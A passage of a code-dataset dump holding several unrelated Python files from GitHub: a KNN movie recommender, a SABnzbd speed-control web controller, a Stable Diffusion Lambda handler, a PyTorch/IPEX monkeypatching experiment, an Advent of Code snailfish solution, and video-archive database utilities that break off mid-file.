'float32'})\ndf_ratings.head\n\nmovies_users=df_ratings.pivot(index='movieId', columns='userId',values='rating').fillna(0)\nmat_movies_users=csr_matrix(movies_users.values)\nmodel_knn= NearestNeighbors(metric='cosine', algorithm='brute', n_neighbors=20)\n\nmodel_knn.fit(mat_movies_users)\n\ndef recommender(movie_name, data, model, n_recommendations ):\n model.fit(data)\n idx=process.extractOne(movie_name, df_movies['title'])[2]\n print('Movie Selected: ',df_movies['title'][idx], 'Index: ',idx)\n print('Searching for recommendations.....')\n distances, indices=model.kneighbors(data[idx], n_neighbors=n_recommendations)\n for i in indices:\n print(df_movies['title'][i].where(i!=idx))\n \nrecommender('Vertigo', mat_movies_users, model_knn,20)\n\n", "repo_name": "Sapphirine/202212-16-Movie-Recommendation-System-With-Chatbot", "sub_path": "Method/KNN.py", "file_name": "KNN.py", "file_ext": "py", "file_size_in_byte": 1558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 24, "usage_type": "call"}, {"api_name": "fuzzywuzzy.process.extractOne", "line_number": 30, "usage_type": "call"}, {"api_name": "fuzzywuzzy.process", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "33094934009", "text": "import properties\n\nclass SabSpeedWebController(object):\n\n def __init__(self, sabSpeedController):\n self.sabSpeedController = sabSpeedController\n \n def index(self):\n return self.getWebHtmlContent();\n index.exposed = True\n \n def setSabSpeed(self, newSpeed=None, minutesToHaveNewSpeed=None):\n print('Speed override received from web UI:')\n print('newSpeed: ' + newSpeed)\n print('minutesToHaveNewSpeed: ' + minutesToHaveNewSpeed)\n self.sabSpeedController.createSabSpeedOverride(newSpeed, minutesToHaveNewSpeed)\n return 'Your speed override has been set (Player!)'\n setSabSpeed.exposed = True\n \n def getWebHtmlContent(self):\n webHtmlContentResult = 'There was a problem getting page html from file :('\n with open(properties.SabSpeedControllerHtmlFile, 'r') as file:\n readData = file.read()\n webHtmlContentResult = readData;\n return webHtmlContentResult\n \n \n \n \n", "repo_name": "peenuty/Sabnzbd-SpeedDistributionCapping", "sub_path": "Sabnzbd-SpeedDistributionCapping/src/SabSpeedControllerWeb.py", "file_name": "SabSpeedControllerWeb.py", "file_ext": "py", "file_size_in_byte": 999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "properties.SabSpeedControllerHtmlFile", "line_number": 22, "usage_type": "attribute"}]} +{"seq_id": "17693158959", "text": "import gc\nimport json\nimport requests\nfrom typing import TypedDict, Optional\nimport tempfile\nimport boto3\nimport cv2\nimport numpy as np\nfrom stable_diffusion_engine import StableDiffusionEngine\nfrom diffusers import LMSDiscreteScheduler, PNDMScheduler # scheduler\n\nDEFAULT_MODEL = \"ShadowPower/waifu-diffusion.openvino\" # model name\nDEFAULT_TOKENIZER = \"openai/clip-vit-large-patch14\" # tokenizer\nDEFAULT_SEED = None # random seed for generating consistent images per prompt\nDEFAULT_BETA_START = 0.00085 # LMSDiscreteScheduler::beta_start\nDEFAULT_BETA_END = 0.012 # LMSDiscreteScheduler::beta_end\nDEFAULT_BETA_SCHEDULE = \"scaled_linear\" # LMSDiscreteScheduler::beta_schedule\nDEFAULT_NUM_INFERENCE_STEPS = 32 # num inference steps\nDEFAULT_GUIDANCE_SCALE = 7.5 # guidance scale\nDEFAULT_ETA = 0.0 # eta\nDEFAULT_PROMPT = \"Street-art painting of Sakura with tower in style of Banksy\" # prompt\nDEFAULT_NEGATIVE_PROMPT = \"\" # negative_prompt\nDEFAULT_INIT_IMAGE = None # path to initial image\nDEFAULT_STRENGTH = 0.5 # how strong the initial image should be noised [0.0, 1.0]\nDEFAULT_MASK = None # mask of the region to inpaint on the initial image\n\nclass Event(TypedDict):\n prompt: Optional[str]\n negative_prompt: Optional[str]\n num_inference_steps: Optional[int]\n init_image: Optional[str]\n mask: Optional[str]\n guidance_scale: Optional[float]\n seed: Optional[int]\n output: Optional[str]\n beta_start: Optional[float]\n beta_end: Optional[float]\n beta_schedule: Optional[str]\n eta: Optional[float]\n strength: Optional[float]\n model: Optional[str]\n tokenizer: Optional[str]\n s3_bucket_name: Optional[str]\n s3_object_name: Optional[str]\n\ndef imread_web(url):\n res = requests.get(url)\n img = None\n with tempfile.NamedTemporaryFile(dir='/tmp') as fp:\n fp.write(res.content)\n fp.file.seek(0)\n img = cv2.imread(fp.name)\n return img\n\ndef handler(event: Event, context):\n gc.collect()\n print(event)\n\n prompt = event.setdefault('prompt', DEFAULT_PROMPT)\n num_inference_steps = event.setdefault('num_inference_steps', DEFAULT_NUM_INFERENCE_STEPS)\n guidance_scale = event.setdefault('guidance_scale', DEFAULT_GUIDANCE_SCALE)\n seed = event.setdefault('seed', DEFAULT_SEED)\n if seed is None:\n import random\n seed = random.randint(0,4294967295)\n np.random.seed(seed)\n model = event.setdefault('model', DEFAULT_MODEL)\n\n if event.setdefault('init_image', DEFAULT_INIT_IMAGE) is None:\n scheduler = LMSDiscreteScheduler(\n beta_start=event.setdefault('beta_start', DEFAULT_BETA_START),\n beta_end=event.setdefault('beta_end', DEFAULT_BETA_END),\n beta_schedule=event.setdefault('beta_schedule', DEFAULT_BETA_SCHEDULE),\n tensor_format=\"np\"\n )\n else:\n scheduler = PNDMScheduler(\n beta_start=event.setdefault('beta_start', DEFAULT_BETA_START),\n beta_end=event.setdefault('beta_end', DEFAULT_BETA_END),\n beta_schedule=event.setdefault('beta_schedule', DEFAULT_BETA_SCHEDULE),\n skip_prk_steps = True,\n tensor_format=\"np\"\n )\n engine = StableDiffusionEngine(\n scheduler = scheduler,\n model = model,\n tokenizer = event.setdefault('tokenizer', DEFAULT_TOKENIZER),\n )\n image = engine(\n prompt = prompt,\n negative_prompt = event.setdefault('negative_prompt', DEFAULT_NEGATIVE_PROMPT),\n init_image = None if event.setdefault('init_image', DEFAULT_INIT_IMAGE) is None else imread_web(event['init_image']),\n mask = None if event.setdefault('mask', DEFAULT_MASK) is None else cv2.imread(imread_web(event['mask']), 0),\n strength = event.setdefault('strength', DEFAULT_STRENGTH),\n num_inference_steps = num_inference_steps,\n guidance_scale = guidance_scale,\n eta = event.setdefault('eta', DEFAULT_ETA)\n )\n del engine\n\n cv2.imwrite('/tmp/output.png', image)\n if event['s3_object_name'] is not None:\n ExtraArgs={'Metadata':{'json':json.dumps({'prompt':prompt,'seed':seed,'num_inference_steps':num_inference_steps,'guidance_scale':guidance_scale,'model':model})}}\n boto3.client('s3').upload_file('/tmp/output.png', event['s3_bucket_name'], event['s3_object_name'], ExtraArgs=ExtraArgs)\n gc.collect()\n", "repo_name": "from20020516/serverless-diffusion-discord", "sub_path": "lib/lambda/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypedDict", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 44, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 52, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "diffusers.LMSDiscreteScheduler", "line_number": 70, "usage_type": "call"}, {"api_name": "diffusers.PNDMScheduler", "line_number": 77, "usage_type": "call"}, {"api_name": "stable_diffusion_engine.StableDiffusionEngine", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 101, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 104, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "74532274404", "text": "import torch\nimport intel_extension_for_pytorch as ipex\nfrom typing import Callable\nimport functools\nimport inspect\n\n# _orig_module_function: Callable = getattr(cls, attr_name)\n# print(\"--------------{}\".format(hasattr(torch.nn.Module, \"__new__\")))\n# print(getattr(torch.nn.Module, \"__new__\"))\n# print(getattr(object, \"__new__\"))\n# exit(-1)\n\norigin_new = getattr(torch.nn.Module, \"__new__\")\n\ndef wrap_new(cls, *args, **kwargs):\n print(\"----inside the new __new__----\")\n obj = object.__new__(cls)\n print(\"obj.__class__ is:{}\".format(obj.__class__), flush=True)\n isOutSideModel = True\n for frameinfo in inspect.stack():\n print(frameinfo.function)\n if frameinfo.function == \"__init__\":\n isOutSideModel = False\n\n insideIPEXOptimize = False\n for frameinfo in inspect.stack():\n print(frameinfo.function)\n if frameinfo.function == \"optimize\":\n insideIPEXOptimize = True\n\n if isOutSideModel and not insideIPEXOptimize:\n origin_class_init = getattr(obj.__class__, \"__init__\")\n def new_init_class(mod, *args, **kwargs):\n print(\"----inside the new new_init_class----\")\n origin_class_init(mod, *args, **kwargs)\n mod = mod.eval()\n # **TODO** Here has problem: mod can't be replaced here\n mod = ipex.optimize(mod, dtype=torch.float32).eval()\n # Possible solution1: https://stackoverflow.com/questions/7940470/is-it-possible-to-overwrite-self-to-point-to-another-object-inside-self-method\n # optimized_self = ipex.optimize(self.eval(), dtype=torch.float32).eval()\n # self.__class__ = optimized_self.__class__\n # self.__dict__ = optimized_self.__dict__\n # It works, but model after ipex.optimize can't to channel_last: model = ipex.optimize(model.eval()).to(memory_format=torch.channels_last).eval()\n # Possible solution2: substitue the call, forward method of mod here\n print(hash(mod))\n print(\"----finish the init of outside module----\", flush=True)\n setattr(obj.__class__, \"__init__\", new_init_class)\n return obj\n\nsetattr(torch.nn.Module, \"__new__\", wrap_new)\n\nimport torch\nimport torch.fx.experimental.optimization as optimization\nimport torchvision.models as models\nimport time\nimport argparse\n\n\"\"\"\nexport LD_PRELOAD=\"/pytorch/leslie/jemalloc/lib/libjemalloc.so\":$LD_PRELOAD\nexport MALLOC_CONF=\"oversize_threshold:1,background_thread:true,metadata_thp:auto,dirty_decay_ms:9000000000,muzzy_decay_ms:9000000000\"\nexport LD_PRELOAD=$LD_PRELOAD:/pytorch/leslie/anaconda3/pkgs/intel-openmp-2021.4.0-h06a4308_3561/lib/libiomp5.so\nKMP_BLOCKTIME=1 KMP_AFFINITY=granularity=fine,compact,1,0 OMP_NUM_THREADS=56 numactl -C 0-55 -m 0 python baseline.py --datatype int8\n\"\"\"\nparser = argparse.ArgumentParser(description='AI everywhere experiments')\nparser.add_argument('--datatype', default='int8', help='path to dataset')\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n if args.datatype == \"bf16\":\n CodeFreeAutocastEnabled = True\n\n iteration = 100\n batch_size = 56\n\n print(\"datatype is:{}\".format(args.datatype))\n print(\"batch_size is:{}\".format(batch_size))\n\n model = models.__dict__[\"resnet50\"](pretrained=True)\n if args.datatype == \"fp32\" or args.datatype == \"bf16\":\n model = model.to(memory_format=torch.channels_last).eval()\n\n x = torch.randn(batch_size, 3, 224, 224).contiguous(memory_format=torch.channels_last)\n\n if args.datatype == \"fp32\":\n # model = ipex.optimize(model, dtype=torch.float32)\n pass\n elif args.datatype == \"bf16\":\n # model = ipex.optimize(model, dtype=torch.bfloat16)\n pass\n else:\n print(\"unsupported data type\", flush=True)\n exit(-1)\n\n with torch.no_grad():\n # warm up\n for i in range(3):\n # print(\"----warm up step: {}\".format(i))\n model(x)\n\n print(\"hash(model) is:{}\".format(hash(model)))\n start = time.time()\n for i in range(iteration):\n # print(\"----step: {}\".format(i))\n if i == 29:\n with torch.profiler.profile(on_trace_ready=torch.profiler.tensorboard_trace_handler(\"./profile_log\")) as prof:\n model(x)\n print(prof.key_averages().table(sort_by=\"self_cpu_time_total\"))\n else:\n model(x)\n # model(x)\n end = time.time()\n print(\"time for one iteration is:{} ms\".format((end-start)/iteration*1000))\n", "repo_name": "leslie-fang-intel/torch_script", "sub_path": "code_free/test_class.py", "file_name": "test_class.py", "file_ext": "py", "file_size_in_byte": 4526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "inspect.stack", "line_number": 20, "usage_type": "call"}, {"api_name": "inspect.stack", "line_number": 26, "usage_type": "call"}, {"api_name": "intel_extension_for_pytorch.optimize", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 64, "usage_type": "call"}, {"api_name": "torchvision.models.__dict__", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torchvision.models", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.channels_last", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.channels_last", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.profiler.profile", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.profiler", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.profiler.tensorboard_trace_handler", "line_number": 106, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "27096653831", "text": "import ast\nfrom math import floor, ceil\nfrom collections import defaultdict, OrderedDict\nfrom itertools import permutations\nfrom copy import deepcopy\n\n\ndef part_one(sf_list):\n\n sf_number = sf_list[0]\n\n for i in range(1, len(sf_list)):\n sf_number = [sf_number, sf_list[i]]\n sf_number = compute_number(sf_number)\n\n while recursive_len(sf_number) > 2:\n sf_number = magnitude(sf_number)\n\n sf_magnitude = sf_number[0] * 3 + sf_number[1] * 2\n return sf_magnitude\n\n\ndef part_two(fs_pt2):\n mag_list = []\n perm_tup = permutations(fs_pt2, 2)\n perm_lst = []\n for line in list(perm_tup):\n perm_lst.append(deepcopy(list(line)))\n\n for x, line in enumerate(perm_lst.copy()):\n c_fish = deepcopy(line)\n c_fish = compute_number(c_fish)\n mag_fish = deepcopy(c_fish)\n\n while recursive_len(mag_fish) > 2:\n mag_fish = magnitude(mag_fish)\n\n sf_magnitude = mag_fish[0] * 3 + mag_fish[1] * 2\n mag_list.append(sf_magnitude)\n return max(mag_list)\n\n\ndef magnitude(fish: list) -> list:\n fish_dict = create_dict_from_list(fish, '', 'list', 'None')\n fish_dict = OrderedDict(sorted(fish_dict.items()))\n for key, value in list(fish_dict.items()):\n elem_size = recursive_len(value[0])\n\n key_size = len(key)\n if elem_size == 2:\n\n if key_size != 1:\n elem_side = int(key[-1])\n element_mag = (value[0][0]) * 3 + (value[0][1] * 2)\n fish_dict[key] = [element_mag, 'int', 'None']\n fish_dict[key[:-1]][0][elem_side] = element_mag\n fish_dict.pop(key)\n else:\n element_mag = (value[0][0]) * 3 + (value[0][1] * 2)\n fish_dict[key] = [element_mag, 'int', 'None']\n\n if isinstance(value[0], int) and key_size != 1:\n fish_dict.pop(key)\n\n return create_list_from_dict(fish_dict)\n\n\ndef recursive_len(item):\n if type(item) == list:\n return sum(recursive_len(subitem) for subitem in item)\n else:\n return 1\n\n\ndef compute_number(sf_number: list):\n\n fish_number = sf_number.copy()\n fish_dict = create_dict_from_list(sf_number, '', 'list', 'None')\n fish_dict = OrderedDict(sorted(fish_dict.items()))\n\n if any([True for k, v in fish_dict.items() if v[2] == 'Explode']):\n fish_dict = explode_dict(fish_dict)\n fish_number = [fish_dict['0'][0], fish_dict['1'][0]]\n compute_number(fish_number)\n elif any([True for k, v in fish_dict.items() if v[2] == 'Split']):\n fish_dict = split_dict(fish_dict)\n fish_number = [fish_dict['0'][0], fish_dict['1'][0]]\n compute_number(fish_number)\n\n return fish_number\n\n\ndef create_dict_from_list(snailfish: list[list], sig: str, t: str, operation: str) -> dict:\n ret = defaultdict(list)\n create_dict(snailfish, sig, t, operation, ret)\n return ret\n\n\ndef create_list_from_dict(sf_dict: dict) -> list:\n return [sf_dict['0'][0], sf_dict['1'][0]]\n\n\ndef create_dict(seq: list, sig: str, t: str, operation: str, m: dict):\n left = seq[0]\n left_sig = sig + '0'\n right = seq[1]\n right_sig = sig + '1'\n m[left_sig] = [left, t, operation]\n m[right_sig] = [right, t, operation]\n\n if len(left_sig) > 3 and isinstance(left, list):\n operation = 'Explode'\n m[left_sig][2] = operation\n if len(right_sig) > 3 and isinstance(right, list):\n operation = 'Explode'\n m[right_sig][2] = operation\n if isinstance(left, list):\n create_dict(left, left_sig, 'list', operation, m)\n\n else:\n t = 'int'\n m[left_sig][1] = t\n if m[left_sig][0] > 9:\n m[left_sig][2] = \"Split\"\n if isinstance(right, list):\n create_dict(right, right_sig, 'list', operation, m)\n else:\n t = 'int'\n m[right_sig][1] = t\n if m[right_sig][0] > 9:\n m[right_sig][2] = \"Split\"\n\n\ndef explode_dict(sf_dict: dict) -> dict:\n\n def _zero(k):\n pre_key = ''\n for i in range(len(k)):\n pre_key += k[i]\n list_copy = sf_dict[pre_key][0]\n zero_key = k[len(pre_key):]\n if len(zero_key) == 1:\n list_copy[int(zero_key[0])] = 0\n\n def _sum(k, v):\n pre_key = ''\n for i in range(len(k)):\n pre_key += k[i]\n value_copy = sf_dict[pre_key][0]\n sum_key = k[len(pre_key):]\n\n if len(sum_key) == 1:\n value_copy[int(sum_key[0])] += v\n\n def _find_l_key(k: str):\n test_key = k + '0'\n while True:\n if sf_dict[test_key][1] == 'int':\n return test_key\n else:\n test_key += '1'\n\n def _find_r_key(k: str):\n test_key = k + '1'\n while True:\n if sf_dict[test_key][1] == 'int':\n return test_key\n else:\n test_key += '0'\n\n for key, value in list(sf_dict.items()):\n if value[2] == \"Explode\":\n side = key[-1]\n if side == '1':\n left_check_sig = _find_l_key(key[:-1])\n right_check_sig = _find_r_key(key.rstrip('1')[:-1])\n else:\n left_check_sig = _find_l_key(key.rstrip('0')[:-1])\n right_check_sig = _find_r_key(key[:-1])\n\n if max(key) != \"0\":\n if sf_dict[left_check_sig][1] == 'int':\n _sum(left_check_sig, value[0][0])\n\n if min(key) != \"1\":\n if sf_dict[right_check_sig][1] == 'int':\n _sum(right_check_sig, value[0][1])\n\n sf_dict[key] = [0, 'int', 'None']\n sf_dict.pop(key + '0')\n sf_dict.pop(key + '1')\n\n _zero(key)\n return sf_dict\n\n\ndef split_dict(sf_dict: dict) -> dict:\n def _clean_dict(k, sp_list):\n pre_key = ''\n for i in range(len(k)):\n pre_key += k[i]\n list_copy = sf_dict[pre_key][0]\n clean_key = k[len(pre_key):]\n\n if len(clean_key) == 1:\n list_copy[int(clean_key[0])] = sp_list\n\n for key, value in list(sf_dict.items()):\n if value[2] == \"Split\":\n split_list = [floor(value[0] / 2), ceil(value[0] / 2)]\n sf_dict[key] = [split_list, 'list', 'None']\n if split_list[0] > 9:\n sf_dict[key + '0'] = [split_list[0], 'int', 'Split']\n else:\n sf_dict[key + '0'] = [split_list[0], 'int', 'None']\n if split_list[1] > 9:\n sf_dict[key + '1'] = [split_list[1], 'int', 'Split']\n else:\n sf_dict[key + '1'] = [split_list[1], 'int', 'None']\n _clean_dict(key, split_list)\n return sf_dict # Exit split_dict() after first element is split\n\n\ndef find_sig_key(input_dict: dict, value: str):\n return {k for k, v in input_dict.items() if k == value}\n\n\ndef add_fish(a: list, b: list) -> list:\n comb_fish = [a, b]\n return comb_fish\n\n\ndef read_file():\n with open('input.txt') as f:\n file = f.read().split()\n output = []\n for i, line in enumerate(file):\n output.append(ast.literal_eval(line))\n return output\n\n\nif __name__ == \"__main__\":\n data = read_file()\n print(f'Part One: Magnitude is {part_one(data)}')\n print(f'Part Two: Max magnitude is {part_two(data)}')\n", "repo_name": "geoncic/AdventOfCode-2021", "sub_path": "Day 18/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7354, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.permutations", "line_number": 25, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 28, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 45, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 94, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 210, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 210, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "19291742395", "text": "import logging\nfrom contextlib import contextmanager\nfrom datetime import datetime, timezone\nfrom typing import (Callable, Concatenate, TypeVar, ParamSpec, Iterable, Type,\n cast, Sequence, Optional, Generator)\n\nfrom psycopg import Cursor, Connection\nfrom psycopg.rows import class_row, BaseRowFactory\nfrom psycopg.types.json import Json\n\nfrom src.channel import BaseChannel\nfrom src.db import models\nfrom src.db.utils import execute_values\nfrom src.enum import Site\nfrom src.video import BaseVideo\n\nlogger = logging.getLogger('debug')\n\nCursorT = TypeVar('CursorT', bound=Cursor)\nConnectionT = TypeVar('ConnectionT', bound=Connection)\nBaseVideoT = TypeVar('BaseVideoT', bound=BaseVideo)\n\n\nP = ParamSpec('P')\nT = TypeVar('T')\n\n\ndef transaction(row_factory: BaseRowFactory[T] = None, real_transaction: bool = False, no_cursor: bool = False):\n def _transaction(f: Callable[Concatenate['WithConnection', P], T]) -> Callable[Concatenate['WithConnection', P], T]:\n def wrapper(self: WithConnection, *args: P.args, **kwargs: P.kwargs) -> T:\n def run_fn() -> T:\n if not no_cursor and 'cur' not in kwargs:\n with self.conn.cursor(row_factory=row_factory) as cur:\n kwargs['cur'] = cur\n return f(self, *args, **kwargs)\n\n return f(self, *args, **kwargs)\n\n if real_transaction:\n with self.conn.transaction():\n return run_fn()\n\n try:\n retval = run_fn()\n self.conn.commit()\n return retval\n except Exception:\n self.conn.rollback()\n raise\n\n return wrapper\n\n return _transaction\n\n\nclass WithConnection:\n def __init__(self, conn: ConnectionT):\n self._conn = conn\n\n @property\n def conn(self) -> ConnectionT:\n return self._conn\n\n @contextmanager\n def class_cursor(self, cls: Type[T]) -> Cursor[T]:\n with self.conn.cursor(row_factory=class_row(cls)) as cur:\n yield cur\n\n\nclass DbUtils(WithConnection):\n @transaction(row_factory=class_row(models.Playlist))\n def add_playlist(self, playlist_id: str, name: str, site: int | Site,\n cur: Cursor[models.Playlist] = NotImplemented) -> models.Playlist:\n \"\"\"\n Adds a playlist to the database if it doesn't exist\n\n Args:\n playlist_id:\n id of the playlist\n name:\n name of the playlist\n site:\n ID of the site being used\n cur:\n Optional cursor\n\n Returns:\n int: The database id of the newly made playlist\n\n \"\"\"\n site = int(site)\n sql = 'INSERT INTO playlists (playlist_id, name, site) VALUES (%s, %s, %s) RETURNING *'\n cur.execute(sql, (playlist_id, name, site))\n return cur.fetchone()\n\n @transaction()\n def update_archived_playlist_videos(self, playlist_id: int, cur: Cursor = NotImplemented):\n \"\"\"\n Use when archive property is set to true on a playlist.\n Will set the download flag to true on each video in the playlist\n \"\"\"\n sql = '''\n UPDATE videos v SET download=TRUE\n FROM playlistvideos pv\n WHERE pv.playlist_id=%s AND v.id=pv.video_id AND v.download=FALSE\n '''\n cur.execute(sql, (playlist_id,))\n logger.info(f'Set download col for {cur.rowcount} videos')\n\n @transaction(real_transaction=True)\n def add_and_update_vids(self, videos: Iterable[BaseVideo], existing_ids: set[str], site: int | Site, cur: Cursor = NotImplemented):\n \"\"\"\n Adds new videos to database and updates the following properties from\n duplicate entries:\n title, description, thumbnail url, publish date\n also sets the deleted flag to False\n\n Do not give deleted videos to this function. It will set the deleted\n flag to true on them\n\n Args:\n videos:\n Iterable of :class:BaseVideo that will be added or updated\n existing_ids:\n Set of all video ids that are in the database for the given site.\n site:\n id of the site being used\n cur:\n Optional cursor\n \"\"\"\n videos_set = set(videos)\n # We can't use intersection because it wouldn't give our custom object\n # instead it always would give a set of values used for comparison\n do_insert = videos_set - existing_ids\n do_update = videos_set - do_insert\n\n if not (do_insert or do_update):\n return\n\n site = int(site)\n\n if do_insert:\n sql = 'INSERT INTO videos AS v (video_id, title, description, published_at, site, thumbnail) ' \\\n 'VALUES %s'\n\n values = tuple(\n (vid.video_id, vid.title, vid.description, vid.published_at, site, vid.thumbnail)\n for vid in do_insert\n )\n\n execute_values(cur, sql, values, page_size=500)\n\n if do_update:\n # https://stackoverflow.com/a/18799497/6046713\n sql = 'UPDATE videos AS v SET ' \\\n 'title=CASE WHEN v.title!=c.title THEN c.title ELSE v.title END, ' \\\n 'description=CASE WHEN v.description!=c.description THEN c.description ELSE v.description END, ' \\\n 'deleted=FALSE,' \\\n 'thumbnail=COALESCE(c.thumbnail, v.thumbnail), ' \\\n 'published_at=CASE WHEN c.published_at >= v.published_at THEN v.published_at ELSE c.published_at END ' \\\n 'FROM (VALUES %s) AS c(video_id, title, description, published_at, site, thumbnail) ' \\\n 'WHERE c.site=v.site AND c.video_id=v.video_id'\n\n values = tuple(\n (vid.video_id, vid.title, vid.description, vid.published_at, site, vid.thumbnail)\n for vid in do_update\n )\n\n execute_values(cur, sql, values, page_size=500)\n\n @transaction(real_transaction=True)\n def add_deleted_vids(self, videos: Iterable[BaseVideo], existing_ids: set[str], site: int | Site, cur: Cursor = NotImplemented):\n \"\"\"\n Sets the deleted flag on the videos provided and also sets the\n deletion time column if the deleted flag hasn't been set before\n\n Args:\n videos:\n Iterable of BaseVideo that are deleted\n site:\n id of the site being used\n cur:\n Optional cursor\n \"\"\"\n videos = set(videos)\n do_insert = videos - existing_ids\n do_update = videos - do_insert\n\n if not (do_insert or do_update):\n return\n\n site = int(site)\n if do_insert:\n t = datetime.now(timezone.utc)\n sql = 'INSERT INTO videos (video_id, title, published_at, site, deleted, deleted_at) VALUES %s'\n\n values = tuple((vid.video_id, t, t) for vid in do_insert)\n\n execute_values(cur, sql, values, page_size=1000, template=f\"(%s, 'Deleted video', %s, {site}, True, %s)\")\n\n if do_update:\n sql = 'UPDATE videos AS v SET ' \\\n 'deleted_at=CASE WHEN v.deleted=FALSE THEN CURRENT_TIMESTAMP ELSE v.deleted_at END, ' \\\n 'deleted=TRUE ' \\\n 'WHERE site=%s AND video_id=ANY(%s)'\n\n cur.execute(sql, [site, [v.video_id for v in do_update]])\n\n @transaction(no_cursor=True, real_transaction=True)\n def add_vid_tags(self,\n videos: set[BaseVideo],\n cached_tags: dict[str, int],\n all_videos: dict[str, int],\n default_tags: list[str] = None):\n \"\"\"\n Adds missing tags to the database based on the provided videos.\n Also updates cached_tags and all_videos\n\n Args:\n videos:\n List of videos from which the tags will be added\n cached_tags:\n tags that have already been cached to memory\n all_videos:\n All videos stored in the db of the specified site.\n default_tags:\n An list of tag names to be applied to every video in the videos\n param\n \"\"\"\n default_tags = [] if not default_tags else default_tags\n tag_values: set[str] = set(default_tags)\n cached_tag_names = set(cached_tags.keys())\n\n # Copy the list of videos since we don't want to edit the original list\n videos = videos.copy()\n for vid in videos.copy(): # This copy is probably needed\n if not vid.data:\n videos.remove(vid)\n continue\n\n tags = vid.tags\n if not tags:\n videos.remove(vid)\n continue\n\n tag_values.update(map(str.lower, tags))\n\n # Get non cached tags and add them to db\n tobecached = tag_values - cached_tag_names\n\n if tobecached:\n sql = 'INSERT INTO tags (tag) VALUES %s ON CONFLICT DO NOTHING RETURNING tag, id'\n with self.class_cursor(models.Tag) as cursor:\n results: list[models.Tag] = execute_values(cursor, sql,\n [(x,) for x in tobecached],\n page_size=1000, fetch=True)\n\n for tag in results:\n cached_tags[tag.tag] = tag.id\n\n values = []\n for vid in videos:\n video_id = all_videos.get(vid.video_id)\n if not video_id:\n logger.warning('Video id not found with %s' % vid)\n continue\n\n # Add video specific tags\n for tag in vid.tags:\n tag_id = cached_tags.get(tag.lower())\n if not tag_id:\n logger.warning('Tag %s not found' % tag)\n continue\n\n values.append((tag_id, video_id))\n\n # Add default tags\n for default_tag in default_tags:\n tag_id = 